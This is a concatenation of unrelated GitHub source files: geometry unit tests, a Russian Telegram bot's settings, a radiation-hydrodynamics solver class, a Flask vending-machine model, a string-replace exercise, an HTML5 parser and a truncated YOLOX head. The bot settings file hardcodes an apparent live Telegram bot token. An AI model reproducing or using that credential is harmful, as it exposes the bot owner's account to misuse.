conical_face = faces.ConicalFace3D.from_surface_rectangular_cut(conical_surface,\n 0, 1.5 * math.pi, 0., 1)\n \"\"\"======== Arc3D =========\"\"\"\n plane1 = surfaces.Plane3D(volmdlr.Frame3D(volmdlr.Point3D(0, 0, 0.5),\n volmdlr.X3D, volmdlr.Y3D, volmdlr.Z3D))\n face = get_face(plane1)\n intersections = face.face_intersections(conical_face)\n self.assertEqual(len(intersections), 1)\n self.assertIsInstance(intersections[0].primitives[0], edges.Arc3D)\n self.assertAlmostEqual(intersections[0].length(), 1.360349523175663)\n \"\"\"========= Hyperbola (BSpline3D) =======\"\"\"\n plane2 = surfaces.Plane3D(\n volmdlr.Frame3D(volmdlr.Point3D(0, 0.25, 0.5), volmdlr.Z3D, volmdlr.X3D, volmdlr.Y3D))\n face = get_face(plane2)\n intersections = face.face_intersections(conical_face)\n self.assertEqual(len(intersections), 1)\n self.assertIsInstance(intersections[0].primitives[0], edges.BSplineCurve3D)\n self.assertAlmostEqual(intersections[0].length(), 1.5797706721593943)\n\n \"\"\"============== Two LineSegments ===================\"\"\"\n plane3 = surfaces.Plane3D(volmdlr.Frame3D(volmdlr.Point3D(0, 0.0, 0.5),\n volmdlr.Z3D, volmdlr.X3D, volmdlr.Y3D))\n face = get_face(plane3)\n intersections = face.face_intersections(conical_face)\n self.assertEqual(len(intersections), 2)\n self.assertIsInstance(intersections[0].primitives[0], edges.LineSegment3D)\n self.assertAlmostEqual(intersections[0].length(), 1.1547005383794386)\n self.assertAlmostEqual(intersections[1].length(), 1.1547005383794386)\n \"\"\"===================== Ellipse 3D =============================\"\"\"\n vector1 = volmdlr.Vector3D(1, 1, 1)\n vector1 = vector1.unit_vector()\n vector2 = vector1.deterministic_unit_normal_vector()\n vector3 = vector1.cross(vector2)\n frame = volmdlr.Frame3D(volmdlr.Point3D(0, 0, 0.5), vector1, vector2, vector3)\n plane4 = surfaces.Plane3D(frame)\n face = get_face(plane4)\n intersections = face.face_intersections(conical_face)\n self.assertEqual(len(intersections), 2)\n self.assertIsInstance(intersections[0].primitives[0], edges.ArcEllipse3D)\n self.assertIsInstance(intersections[1].primitives[0], edges.ArcEllipse3D)\n self.assertAlmostEqual(intersections[0].length(), 0.7233023692399578)\n self.assertAlmostEqual(intersections[1].length(), 1.1339664625179093, 6)\n \"\"\"================== Parabola ====================\"\"\"\n point1 = conical_surface.frame.origin\n point2 = conical_surface.frame.local_to_global_coordinates(\n volmdlr.Point3D(10 * math.tan(conical_surface.semi_angle), 0, 10))\n generatrix = edges.LineSegment3D(point1, point2)\n normal = generatrix.unit_normal_vector()\n plane_origin = frame.origin - normal * .5\n plane5 = surfaces.Plane3D.from_normal(plane_origin, normal)\n face = get_face(plane5)\n intersections = face.face_intersections(conical_face)\n self.assertEqual(len(intersections), 1)\n self.assertIsInstance(intersections[0].primitives[0], edges.BSplineCurve3D)\n self.assertAlmostEqual(intersections[0].length(), 1.19097843887217)\n\n def test_linesegment_inside(self):\n lineseg = volmdlr.edges.LineSegment3D(volmdlr.Point3D(0.2, 0, -0.2), volmdlr.Point3D(0.1, 0.0, 0.2))\n self.assertTrue(self.plane_face_cylindricalface_intersec.linesegment_inside(lineseg))\n lineseg1 = volmdlr.edges.LineSegment3D(volmdlr.Point3D(0.2, 0, -0.2), volmdlr.Point3D(0.1, 0.1, 0.2))\n self.assertFalse(self.plane_face_cylindricalface_intersec.linesegment_inside(lineseg1))\n\n def test_circle_inside(self):\n circle = curves.Circle3D(volmdlr.OZXY, 0.1)\n self.assertTrue(self.plane_face_cylindricalface_intersec.circle_inside(circle))\n circle2 = curves.Circle3D(volmdlr.OYZX, 0.1)\n self.assertFalse(self.plane_face_cylindricalface_intersec.circle_inside(circle2))\n\n def test_merges_faces(self):\n source_folder = os.path.join(folder, 'test_planeface3d_merge_faces_json_files')\n faces_areas = []\n file_names = ['test_merge_faces4.json', 'test_merge_faces5.json', 'faces_merge_faces2.json',\n 'faces_merge_faces3.json', 'faces_merge_faces4.json']\n for filename in file_names:\n file_path = os.path.join(source_folder, filename)\n obj = dc.DessiaObject.load_from_file(file_path)\n faces_ = obj.primitives\n merged_faces = faces.PlaneFace3D.merge_faces(faces_)\n areas = []\n for face in merged_faces:\n areas.append(face.area())\n faces_areas.append(areas)\n expected_faces_areas = [[0.1621764423452034], [0.15508002569387766],\n [0.005347587092921799, 0.032085522557310564, 0.18181796115851334],\n [0.08021380639307588],\n [0.05578804359331602, 0.005578804359362449, 0.011157608718620371,\n 0.022315217437398727, 0.05020923923410867]]\n for solution, expected_solution in zip(faces_areas, expected_faces_areas):\n self.assertEqual(len(solution), len(expected_solution))\n for solution_area, expected_solution_area in zip(solution, expected_solution):\n self.assertAlmostEqual(solution_area, expected_solution_area)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"Dessia-tech/volmdlr","sub_path":"tests/faces/test_planeface3d.py","file_name":"test_planeface3d.py","file_ext":"py","file_size_in_byte":16321,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"34"} +{"seq_id":"21486050301","text":"import psycopg2\r\nimport os, sys\r\n\r\nPROJECT_ROOT = os.path.dirname(__file__)\r\nprint(PROJECT_ROOT)\r\nsys.path.insert(0, os.path.join(PROJECT_ROOT, 'users'))\r\n\r\n# подключаем БД\r\nconn = psycopg2.connect(dbname='', user='',\r\n password='', host='')\r\ncursor = conn.cursor() # обращаться будем через курсор\r\n\r\nBotToken = '928197350:AAH5MzOU1Iwtb02v1xjYDloygFKFgefIePU' # это API бота @mse_soft_u_bot\r\n\r\n# -------------------------ВСЕ ОСНОВНЫЕ ТЕКСТОВЫЕ ФАЙЛЫ ------------------------------------------------------------\r\n\r\ntext_starter = \"Привет! Меня зовут MSE-MSU BOT \" + '\\n \\n' + 'Через меня можно узнавать РАСПИСАНИЕ на учебную неделю, ' \\\r\n '\\n можно ' \\\r\n 'отметиться на ' \\\r\n 'паре, если ты, ' \\\r\n 'конечно, ' \\\r\n 'на ней находишься, ' \\\r\n 'и даже узнать ' \\\r\n 'ДЗ.\\n \\n' \\\r\n 'Подробнее можно ' \\\r\n 'ознакомиться с ' \\\r\n 'проектом, ' \\\r\n 'нажав кнопку \"О ' \\\r\n 'нас\". '\r\n\r\ntext_info = '\\U00002139 Немного о нас!' \\\r\n '\\n\\nПроект по созданию ботов мы запустили довольно давно. На сегодняшний день во многих институтах плохо ' \\\r\n 'развита система отображения расписаний.' \\\r\n ' Для того чтобы посмотреть текущее расписание, нужно зайти на сайт, а потом скачать неудобную таблицу.' \\\r\n '\\n\\nВ связи с этим, нами было принято решение собрать команду разработчиков, которые смогли бы ' \\\r\n 'трансформировать расписание вузов в пару кнопок. ' \\\r\n 'Наши боты уже зарекомендовали себя на рынке. Они славятся своей простотой использования.' \\\r\n '\\n\\nВы можете купить наше ПО на сайте - softwareu.ru !'\r\n\r\ntext_help = 'Контакты поддержки:\\n\\n\\U0000260E' \\\r\n 'Телефон: +7(964)723-56-82\\n\\U0001F4E7' \\\r\n 'Email: #наша_корпоративная_почта\\n\\U0001F468\\U0000200D\\U0001F4BB' \\\r\n 'Технический директор - @grom_1337'\r\n\r\ngroupe_list = ['101', '102', '103', '104', '201', '202', '203', '204', '301', '302', '303', '304', '401', '402',\r\n '403', '404', '501', '502']\r\n\r\ngroupe_list_2 = ['100', '101', '102', '103', '104', '200', '201', '202', '203', '204', '300', '301',\r\n '302', '303', '304', '400', '401',\r\n '402',\r\n '403', '404', '500', '501', '502']\r\n\r\n\r\ndef subject_list():\r\n cursor.execute(\"SELECT ОГД FROM table_info\")\r\n subjects_1 = [item[0] for item in cursor.fetchall()]\r\n conn.commit()\r\n\r\n cursor.execute(\"SELECT ЭММЭ FROM table_info\")\r\n subjects_2 = [item[0] for item in cursor.fetchall()]\r\n conn.commit()\r\n\r\n cursor.execute(\"SELECT ЭиФС FROM table_info\")\r\n subjects_3 = [item[0] for item in cursor.fetchall()]\r\n conn.commit()\r\n\r\n cursor.execute(\"SELECT ОЭТ FROM table_info\")\r\n subjects_4 = [item[0] for item in cursor.fetchall()]\r\n conn.commit()\r\n\r\n subjects = subjects_1 + subjects_2 + subjects_3 + subjects_4\r\n\r\n result = list(filter(None, subjects))\r\n\r\n return result # убирает все None из списка\r\n\r\n\r\n# print(subject_list())\r\n# print(subject_list())\r\n","repo_name":"digitalstudsovetmsu/bots_tg","sub_path":"SoftUbot/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":4631,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"17005034719","text":"#!/usr/bin/env python3\nfrom reconstruct_data import ReconstructData\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sys\n\nclass Fields:\n #########################################################################\n # Description:\n # Solution handling class. Here, the physical variables and conserved\n # hydro quantities are initialized and stored. General functions \n # pertaining common to several different steps in this algorithm are \n # defined here for easy and consistent access.Functions pertaining to solving the \n # actual physics equations are located in their respective classes\n # corresponding to the step of the algorithm.\n #########################################################################\n def __init__(self, rh):\n self.rh = rh\n self.inp = rh.inp\n self.mat = rh.mat\n self.geo = rh.geo\n \n # Init density storage\n self.rho = self.initializeAtCenters(self.inp.rho)\n self.rho_n = np.copy(self.rho)\n self.rho_old = np.copy(self.rho)\n\n # Init velocity storage\n self.u = self.initializeAtCenters(self.inp.u)\n self.u_n= np.copy(self.u)\n self.u_old = np.copy(self.u)\n \n # Init temperature storage\n self.T = self.initializeAtCenters(self.inp.T)\n self.T_n = np.copy(self.T)\n self.T_old = np.copy(self.T)\n \n # Init specific internal energy storage\n self.e = self.inp.C_v * self.T\n self.e_n = np.copy(self.e)\n self.e_old = np.copy(self.e)\n \n # Init pressure storage\n self.P = self.rh.mat.pressureEOS(self.rho * self.e)\n self.P_n = np.copy(self.P)\n self.P_old = np.copy(self.P)\n \n # Init momentum storage\n self.M = self.rho * self.u\n self.M_n = np.copy(self.M)\n self.M_old = np.copy(self.M)\n \n # Total material energy\n self.Em = self.rho * (0.5 * self.u**2 + self.e)\n self.Em_n = np.copy(self.Em) \n self.Em_old = np.copy(self.Em)\n \n # Hydro vectors\n self.U_n = np.hstack((self.rho_n, self.M_n, self.Em_n))\n self.U_old = np.copy(self.U_n)\n \n # Hydro boudary conditions\n if self.inp.bc_L_hydro_type == \"fixed\":\n self.rho_bL = self.inp.rho(self.geo.rL)\n self.u_bL = self.inp.u(self.geo.rL)\n self.T_bL = self.inp.T(self.geo.rL)\n self.e_bL = self.inp.C_v * self.T_bL\n self.P_bL = self.mat.pressureEOS(self.rho_bL * self.e_bL)\n self.M_bL = self.rho_bL * self.u_bL\n self.Em_bL = self.rho_bL * (0.5 * self.u_bL**2 + self.e_bL)\n self.U_bL = np.array([self.rho_bL, self.M_bL, self.Em_bL])\n else:\n self.rho_bL = None\n self.u_bL = None\n self.T_bL = None\n self.e_bL = None\n self.P_bL = None\n self.M_bL = None\n self.Em_bL = None\n self.U_bL = None \n \n if self.inp.bc_R_hydro_type == \"fixed\":\n self.rho_bR = self.inp.rho(self.geo.rR)\n self.u_bR = self.inp.u(self.geo.rR)\n self.T_bR = self.inp.T(self.geo.rR)\n self.e_bR = self.inp.C_v * self.T_bR\n self.P_bR = self.mat.pressureEOS(self.rho_bR * self.e_bR)\n self.M_bR = self.rho_bR * self.u_bR\n self.Em_bR = self.rho_bR * (0.5 * self.u_bR**2 + self.e_bR)\n self.cs_bR = self.mat.computeSoundSpeed(self.rho_bR, self.P_bR)\n self.U_bR = np.array([self.rho_bR, self.M_bR, self.Em_bR])\n else:\n self.rho_bR = None\n self.u_bR = None\n self.T_bR = None\n self.e_bR = None\n self.P_bR = None\n self.M_bR = None\n self.Em_bR = None\n self.U_bR = None\n \n \n # Init radiation energy density\n self.Er = self.initializeAtCenters(self.inp.Er)\n self.Er_n = np.copy(self.Er)\n self.Er_old = np.copy(self.Er)\n \n # Set radiation boundary conditions\n if self.inp.bc_L_rad_type == \"source\":\n if self.inp.bc_L_rad_val == None:\n self.Er_bL = self.inp.Er(self.inp.rL)\n else:\n self.Er_bL = self.inp.bc_L_rad_val\n else:\n self.Er_bL = None\n\n if self.inp.bc_R_rad_type == \"source\":\n if self.inp.bc_R_rad_val == None:\n self.Er_bR = self.inp.Er(self.inp.rR)\n else:\n self.Er_bR = self.inp.bc_R_rad_val\n else:\n self.Er_bR = None\n \n # Hydro LD values --- Constructed after init\n self.U_ld, self.P_ld = np.zeros((self.geo.N,3,2)), np.zeros((self.geo.N,2))\n \n # Radiation LD values --- Constructed after init\n self.Er_ld = np.zeros((self.geo.N,1,2))\n \n # Slopes\n self.U_slopes = np.zeros((self.geo.N,3,2))\n self.Er_slopes = np.zeros((self.geo.N,2))\n \n # Radiation edge values -- Constructed after init\n self.Er_edge = np.zeros(self.geo.N+1)\n \n # Energy conservation book keeping\n self.material_energy = []\n self.material_advection = []\n self.radiation_energy = []\n self.radiation_leakage = []\n self.radiation_advection = []\n self.total_energy = []\n \n # Set initial energy in system\n Emat, Erad = 0, 0\n for i in range(self.geo.N):\n Emat += self.geo.V[i] * self.Em_old[i]\n Erad += self.geo.V[i] * self.Er_old[i]\n print(\"Emat Erad\", Emat, Erad)\n self.material_energy.append(Emat)\n self.material_advection.append(0)\n self.radiation_energy.append(Erad)\n self.radiation_leakage.append(0)\n self.radiation_advection.append(0)\n self.total_energy.append(Emat + Erad)\n \n self.total_material_advection = 0\n self.total_radiation_advection = 0 \n self.total_radiation_leakage = 0\n \n \n ##### FUNCTIONS #####\n\n\n #########################################################################\n # Description:\n # Initialize solution variables at cell centers using specified ICs\n #########################################################################\n def initializeAtCenters(self, function):\n values = np.zeros([self.geo.N, 1])\n if function is not None:\n for i in range(self.geo.N):\n values[i] = function(self.geo.r[i])\n return values\n \n #########################################################################\n # Description:\n # Move most recent field variables to old field variables.\n #########################################################################\n def stepSolutions(self):\n self.rho_old = np.copy(self.rho)\n self.u_old = np.copy(self.u)\n self.e_old = np.copy(self.e)\n self.P_old = np.copy(self.P)\n self.T_old = np.copy(self.T)\n self.M_old = np.copy(self.M)\n self.Em_old = np.copy(self.Em)\n self.Er_old = np.copy(self.Er)\n \n \n #########################################################################\n # Description:\n # Form a vector containing all hydro quantities at cell centers of the mesh.\n #########################################################################\n def updateConservedHydroVector(self, predictor=True):\n if predictor:\n self.U_old = np.hstack((self.rho_old, self.M_old, self.Em_old))\n else:\n self.U_n = np.hstack((self.rho_n, self.M_old, self.Em_n)) \n \n \n #########################################################################\n # Description:\n # Compute edge radiation values using continuity of current across cell\n # interfaces. This yields a diffusion coefficient weighted harmonic\n # mean at each interface. This by definition is only performed for \n # interior cell interfaces\n ######################################################################### \n def updateEdgeRadiationEnergy(self, predictor):\n # Shorthand\n dr = self.geo.dr\n D_edge = self.mat.D_edge\n Er_edge = self.Er_edge\n \n # Query correct variables\n if predictor:\n Er = self.Er_old\n rho = self.rho\n T = self.T_old\n else:\n Er = self.Er_n\n rho = self.rho_n\n T = self.T_n\n \n # Left boundary\n if self.inp.bc_L_rad_type == \"source\":\n kappa_t_L = self.mat.kappa_funcs[0](T[0]) + self.mat.kappa_s[0]\n coef_L = 3 * rho[0] * kappa_t_L * dr[0]\n Er_edge[0] = (3*coef_L*self.Er_bL + 4*Er[0]) / (coef_L + 4) \n else:\n Er_edge[0] = Er[0]\n \n # Interior edges\n for i in range(1, self.geo.N):\n coef_L = D_edge[i-1,1] / dr[i-1]\n coef_R = D_edge[i,0] / dr[i]\n Er_edge[i] = (coef_R*Er[i] + coef_L*Er[i-1])/(coef_L + coef_R)\n \n # Right boundary\n if self.inp.bc_R_rad_type == \"source\":\n kappa_t_R = self.mat.kappa_funcs[-1](T[-1]) + self.mat.kappa_s[-1]\n coef_R = 3 * rho[-1] * kappa_t_R * dr[-1]\n Er_edge[-1] = (3*coef_R*self.Er_bR + 4*Er[-1]) / (coef_L + 4)\n else:\n Er_edge[-1] = Er[-1]\n \n \n #########################################################################\n # Description:\n # Compute edge fluxes from reconstructed edge data for either hydro or\n # radiation energy. This function generated edge values for the conserved\n # quantities (hydro/radiation), computes the auxillary variable \n # (pressure/velocity), and then computes fluxes from that.\n #########################################################################\n def computeFluxes(self, U_ld, X_ld):\n U_ld = np.atleast_3d(U_ld)\n X_ld = np.atleast_2d(X_ld)\n \n # Init edge fluxes\n F_edge = np.zeros(U_ld.shape)\n \n # Hydro fluxes\n if (U_ld.shape[1] == 3):\n # mass flux\n F_edge[:,0,:] = U_ld[:,1,:]\n # momentum flux\n F_edge[:,1,:] = U_ld[:,1,:]**2/U_ld[:,0,:] + X_ld\n # energy flux\n F_edge[:,2,:] = (U_ld[:,2,:] + X_ld) * U_ld[:,1,:]/U_ld[:,0,:]\n \n # Radiation flux\n else:\n # Radiation energy flux\n F_edge[:,0,:] = U_ld[:,0,:] * X_ld \n \n return F_edge \n \n \n #########################################################################\n # Description:\n # Energy conservation checker\n #########################################################################\n def energyConservationCheck(self):\n # Shorthand\n A = self.geo.A\n V = self.geo.V\n dt = self.rh.dt\n dr = self.geo.dr\n c = self.mat.c\n \n # Shorthand field variables\n Em = self.Em\n Em_np = self.Em_n\n Er = self.Er\n Er_np = self.Er_n\n Er_old = self.Er_old\n Er_n = 0.5 * (Er + Er_old)\n T_np = self.T_n\n rho_np = self.rho_n\n P_np = self.P_n\n u_np = self.u_n\n D_edge = self.mat.D_edge\n \n material_energy = self.material_energy\n material_advection = self.material_advection\n radiation_energy = self.radiation_energy\n radiation_leakage = self.radiation_leakage\n radiation_advection = self.radiation_advection\n total_energy = self.total_energy\n \n # Total material and radiation energy\n Emat, Erad = 0, 0\n for i in range(self.geo.N):\n Emat += V[i] * Em[i] \n Erad += V[i] * Er[i]\n print(\"Er0 ErNm1 Em0 EmNm1\",Er[0],Er[self.geo.N-1],Em[0],Em[self.geo.N-1])\n material_energy.append(Emat)\n radiation_energy.append(Erad)\n \n # Advection leakage and work energy\n if self.inp.bc_L_hydro_type == \"transmissive\":\n F_L_madv = (Em_np[0] + P_np[0]) * u_np[0]\n if self.inp.mode == \"radhydro\":\n F_L_radv = 4./3. * Er_np[0] * u_np[0]\n else:\n F_L_radv = 0.0\n else:\n F_L_madv, F_L_radv = 0.0, 0.0\n \n if self.inp.bc_R_hydro_type == \"transmissive\":\n F_R_madv = (Em_np[-1] + P_np[-1]) * u_np[-1]\n if self.inp.mode == \"radhydro\":\n F_R_radv = 4./3. * Er_np[-1] * u_np[-1]\n else:\n F_R_radv = 0.0\n else: \n F_R_madv, F_R_radv = 0.0, 0.0\n mat_adv = (A[-1] * F_R_madv - A[0] * F_L_madv) * dt\n rad_adv = (A[-1] * F_R_radv - A[0] * F_L_radv) * dt\n material_advection.append(mat_adv)\n radiation_advection.append(rad_adv)\n self.total_material_advection += mat_adv\n self.total_radiation_advection += rad_adv\n \n # Radiation leakage\n if self.inp.bc_L_rad_type == \"source\":\n coef_F_L = -2 * c / (4 + dr[0] / D_edge[0,0])\n F_L_rad = coef_F_L * (Er_n[0] - self.Er_bL)\n else:\n F_L_rad = 0.0\n if self.inp.bc_R_rad_type == \"source\":\n coef_F_R = -2 * c / (4 * dr[-1] / D_edge[-1,1])\n F_R_rad = coef_F_R * (self.Er_bR - Er_n[-1])\n else:\n F_R_rad = 0.0\n rad_leakage = (A[-1] * F_R_rad - A[0] * F_L_rad) * dt\n radiation_leakage.append(rad_leakage)\n self.total_radiation_leakage += rad_leakage\n \n # Total energy\n total = Emat + Erad + mat_adv + rad_adv + rad_leakage\n total_energy.append(total)\n \n # Compute energy balance\n dEmat = Emat - material_energy[0]\n dErad = Erad - radiation_energy[0]\n total_mat_adv = self.total_material_advection\n total_rad_adv = self.total_radiation_advection\n total_rad_leak = self.total_radiation_leakage\n\n print(\"dEmat \",dEmat ,\"\\n\",\n \"dErad \",dErad ,\"\\n\",\n \"total_mat_adv \",total_mat_adv ,\"\\n\",\n \"total_rad_adv \",total_rad_adv ,\"\\n\",\n \"total_rad_leak \",total_rad_leak,\"\\n\",\n \"mat_adv {:1.16e} \".format(mat_adv[0]) ,\"\\n\",\n \"rad_adv {:1.16e} \".format(rad_adv[0]) ,\"\\n\",\n \"rad_leakage \",rad_leakage ,\"\\n\",\n )\n \n return dEmat + dErad + total_mat_adv + total_rad_adv + total_rad_leak\n \n\n #########################################################################\n # Description:\n # This function plots the desired field variable specified.\n #########################################################################\n def plotFields(self, variables, styles=[], xlims=[], ylims=[],savename=\"\",title=\"\"):\n fig = plt.figure()\n plt.rc(\"text\", usetex=True)\n for i, var in enumerate(variables):\n vals = getattr(self, var)\n if len(variables) == 1 and \"Er\" in var:\n label = \"Radiation Energy\"\n plt.ylabel(\"Radiation Energy (jerks/cm$^3$)\", fontsize=16)\n elif \"Er\" in var:\n vals = (vals / self.inp.a)**(1/4)\n label = \"Radiation Temperature\"\n elif \"T\" in var:\n label = \"Temperature\"\n plt.ylabel(\"Temperature (keV)\", fontsize=16)\n elif \"rho\" in var:\n label = \"Mass Density\"\n plt.ylabel(\"Mass Density (g/cm$^3$)\", fontsize=16)\n elif \"u\" in var:\n label = \"Velocity\"\n plt.ylabel(\"Velocity (cm/sh)\", fontsize=16)\n elif \"e\" in var:\n label = \"Internal Energy\"\n plt.ylabel(\"Internal Energy (jerks/g)\", fontsize=16)\n \n plt.plot(self.geo.r, vals, styles[i], ms=2.5, label=label)\n \n plt.xlabel(\"r (cm)\",fontsize=16)\n if xlims == []:\n plt.xlim([self.geo.rL, self.geo.rR])\n else:\n plt.xlim(xlims)\n if ylims != []:\n plt.ylim(ylims)\n plt.grid()\n plt.legend(fontsize=10)\n plt.title(title)\n if savename != \"\":\n plt.savefig(savename)\n # plt.show()\n \n ","repo_name":"Naktakala/rad_hydro","sub_path":"References/eulerian-radhydro-master/fields.py","file_name":"fields.py","file_ext":"py","file_size_in_byte":16360,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"1855750966","text":"import flask\nimport flask_sqlalchemy\nfrom change import change_money\n\napp = flask.Flask(__name__, static_url_path='/static')\napp.config['DEBUG'] = True\napp.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql://user:password@localhost/vms'\n# app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:////tmp/test.db'\ndb = flask_sqlalchemy.SQLAlchemy(app)\n\n\nclass Good(db.Model):\n \"\"\"\n This is something that we can sell in Vending Machine. Can be tea, coffee,\n or even a nuclear weapon - it's your Vending Machine, so you can decide what\n you want to sell in it.\n \"\"\"\n #: the unique id\n id = db.Column(db.Integer, primary_key=True)\n #: the human readable name of this stuff\n name = db.Column(db.String)\n #: the price per unit\n price = db.Column(db.Integer)\n #: how many items we have in stock\n amount = db.Column(db.Integer)\n #: the Vending Machine where we sell it\n vm_id = db.Column(db.Integer, db.ForeignKey('vending_machine.id'))\n\n\nclass Buyer(db.Model):\n \"\"\"\n This is the user, how can buy something in Vending Machine (or just change\n some money)\n \"\"\"\n #: the unique id\n id = db.Column(db.Integer, primary_key=True)\n #: how many coins of 1 ruble the user have\n coins_1 = db.Column(db.Integer, default=10)\n #: how many coins of 2 rubles the user have\n coins_2 = db.Column(db.Integer, default=30)\n #: how many coins of 5 rubles the user have\n coins_5 = db.Column(db.Integer, default=20)\n #: how many coins of 10 rubles the user have\n coins_10 = db.Column(db.Integer, default=15)\n #: the unique token for identify the buyer\n token = db.Column(db.String, unique=True)\n\n def get_coins(self):\n \"\"\"\n This method return a dict with all available coins\n \"\"\"\n coins = {1: self.coins_1, 2: self.coins_2,\n 5: self.coins_5, 10: self.coins_10}\n return coins\n\n def give_coin(self, coin):\n \"\"\"\n This method ask for a coin and return True if user give this coin, or\n False if it haven't this kind of coins\n\n :param int coin: the coin ask we for\n :returns: True if the operation is successful\n :rtype: bool\n \"\"\"\n field = 'coins_%d' % coin\n if hasattr(self, field):\n value = getattr(self, field)\n if value > 0:\n setattr(self, field, value - 1)\n return True\n return False\n\n def add_coins(self, coins):\n \"\"\"\n This method will put in the wallet of user the given coins\n\n :param dict coins: a dict with key as value of coin and value as its amount\n :returns: True is operation is successful\n :rtype: bool\n \"\"\"\n for coin, amount in coins.iteritems():\n field = 'coins_%d' % coin\n value = getattr(self, field)\n setattr(self, field, value + amount)\n return True\n\n\nclass VendingMachine(db.Model):\n \"\"\"\n This is our Vending Machine\n \"\"\"\n #: unique id\n id = db.Column(db.Integer, primary_key=True)\n #: how many coins of 1 ruble the vm have\n coins_1 = db.Column(db.Integer, default=100)\n #: how many coins of 2 rubles the vm have\n coins_2 = db.Column(db.Integer, default=100)\n #: how many coins of 5 rubles the vm have\n coins_5 = db.Column(db.Integer, default=100)\n #: how many coins of 10 rubles the vm have\n coins_10 = db.Column(db.Integer, default=100)\n #: the amount of money, available for buying something\n buff = db.Column(db.Integer, default=0)\n #: the list of all stuff we can buy in VM\n goods = db.relationship(Good, backref=\"vm\")\n #: the current user that use this VM\n buyer_id = db.Column(db.Integer, db.ForeignKey('buyer.id'), nullable=True)\n buyer = db.relationship(Buyer, backref='vending_machine')\n\n def get_coins(self):\n \"\"\"\n This method return a dict with all available coins\n \"\"\"\n coins = {1: self.coins_1, 2: self.coins_2,\n 5: self.coins_5, 10: self.coins_10}\n return coins\n\n def substract(self, coins):\n \"\"\"\n Substract the given list of coins from Vending Machine\n\n :param dict coins: a dict of coins (format like in get_coins)\n :returns: True if operation was successful\n :rtype: bool\n \"\"\"\n for coin, amount in coins.iteritems():\n field = 'coins_%d' % coin\n value = getattr(self, field)\n setattr(self, field, value - amount)\n return True\n\n def add_to_buff(self, coin):\n \"\"\"\n Add a coin to buffer\n\n :param int coin: the value of coin\n :returns: True if the operation was successful\n :rtype: bool\n \"\"\"\n field = 'coins_%d' % coin\n if hasattr(self, field):\n value = getattr(self, field)\n setattr(self, field, value + 1)\n self.buff += coin\n return True\n return False\n\n def return_from_buff(self):\n \"\"\"\n Return all money from VMs buffer to user\n\n :returns: a dict with changed money from buffer (as in get_coins)\n :rtype: dict\n \"\"\"\n ret = {}\n if self.buff > 0:\n ret = change_money(self.buff, self.get_coins())\n self.substract(ret)\n self.buff = 0\n return ret\n","repo_name":"gnunixon/vending_machine_sim","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"74475453856","text":"#Write a program to find and replace a particular pattern in a string with a given pattern.\n#For example:\n'''\nEnter a sentence: My favourite programming language is Python. This language is very flexible and will not age.\nEnter a pattern to find: age\nEnter a pattern to replace: xyz\nOriginal Sentence: My favourite programming language is Python. This language is very flexible and will not age.\nReplaced Sentence: My favourite programming languxyz is Python. This languxyz is very flexible and will not xyz.\n'''\n#User input\nsentence=input(\"Enter a sentence: \")\npattern=input(\"Enter a pattern to find: \")\nreplace=input(\"Enter a pattern to replace: \")\n#pattern length\npLen = len(pattern)\ns=sentence2=\"\"\ni=0\n#replacing the sentence\nwhile i < len(sentence):\n s=sentence[i:pLen+i]\n if s==pattern:\n s=\"\"\n sentence2+=replace\n i+=pLen\n else:\n sentence2+=sentence[i]\n i+=1\nprint(\"Original Sentence: \",sentence)\nprint(\"Replaced Sentence: \",sentence2)\n","repo_name":"Easyvipin/Practice-Python","sub_path":"Strings/q21.py","file_name":"q21.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"34"} +{"seq_id":"10223883663","text":"\"\"\"\nHTML5 parsing.\n\"\"\"\n\nimport html5lib\n\ndef article(pathname):\n \"\"\"\n Find the top-most
    in the HTML5 document at pathname.\n \"\"\"\n return _article(html5lib.parse(open(pathname)))\ndef _article(node):\n if 0 == len(node.childNodes):\n return None\n for n in node.childNodes:\n if \"article\" == n.name:\n return n\n for n in node.childNodes:\n out = _article(n)\n if out is not None:\n return out\n\ndef article_title(article):\n \"\"\"\n Return the title of the HTML5
    . This is the contents of the\n

    and all its children with tags stripped. If necessary, this will\n traverse
    and
    tags.\n \"\"\"\n for n in article.childNodes:\n if \"h1\" == n.name:\n return _article_title(n)\n elif \"hgroup\" == n.name or \"header\" == n.name:\n return article_title(n)\n return None\ndef _article_title(node):\n title = []\n for n in node.childNodes:\n if n.name is None:\n title.append(n.value)\n else:\n title.extend(_article_title(n))\n return \"\".join(title)\n","repo_name":"rcrowley/spoon","sub_path":"spoon/html5.py","file_name":"html5.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"34"} +{"seq_id":"72236251298","text":"import math\nimport time\nfrom loguru import logger\n\nimport numpy as np\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom dass_det.utils import bboxes_iou, intersect, cxcywh2xyxy\n\nfrom .network_blocks import BaseConv, DWConv\n\n\nclass YOLOXHead(nn.Module):\n def __init__(\n self,\n num_classes,\n width=1.0,\n strides=[8, 16, 32],\n in_channels=[256, 512, 1024],\n act=\"silu\",\n depthwise=False,\n loss_fn=None\n ):\n \"\"\"\n Args:\n act (str): activation type of conv. Defalut value: \"silu\".\n depthwise (bool): whether apply depthwise conv in conv branch. Defalut value: False.\n \"\"\"\n super().__init__()\n\n self.num_classes = num_classes\n \n self.reg_convs = nn.ModuleList()\n self.reg_preds = nn.ModuleList()\n self.obj_preds = nn.ModuleList()\n \n Conv = DWConv if depthwise else BaseConv\n\n for i in range(len(in_channels)):\n\n self.reg_convs.append(\n nn.Sequential(\n *[\n Conv(\n in_channels=int(256 * width),\n out_channels=int(256 * width),\n ksize=3,\n stride=1,\n act=act,\n ),\n Conv(\n in_channels=int(256 * width),\n out_channels=int(256 * width),\n ksize=3,\n 